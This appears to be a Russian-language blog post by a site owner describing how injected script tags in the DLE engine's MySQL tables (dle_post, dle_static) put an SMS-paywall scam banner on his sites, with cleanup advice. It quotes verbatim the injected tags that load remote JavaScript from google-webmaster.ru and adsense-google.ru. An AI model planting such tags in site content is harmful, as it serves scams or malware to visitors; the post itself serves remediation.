google-webmaster.ru
adsense-google.ru
Как то раз зашел я на один из собственных сайтов и увидел рекламный баннер с просьбой отослать смс на платный номер чтобы получить на моем сайте доступ к закрытому контенту. На другом компьютере был полный бекап движка, поэтому сразу же попробывал восстановить, но немного удивился так-как рекламный баннер по прежнему оставался на сайте (очистка кеша браузера не помогла). Был установлен движок DLE 9.7 лицензионный. Осталось проверять только базу MySQL.
Вот где нашел вредоносный код.
Таблица: dle_post
Столб: short_story
Столб: full_story
Удаляем в каждой новости данный скрипт в базе в таблице dle_post столбы short_story и full_story
<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>
Так же проверьте таблицу : dle_static на наличие того же куска кода
<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>
Но позже история повторилась с версией DLE 10.0 (как сломали не знаю, троянов нет, пароли сменены, движок полностью сменил и тоже лицензионный)
таблицы теже (dle_post, dle_static) а скрипт уже такой
<script type="text/javascript" async="async" src="http://adsense-google.ru/js/e4da3b7fbbce2345d7772b0674a318d5.js"></script>
| 
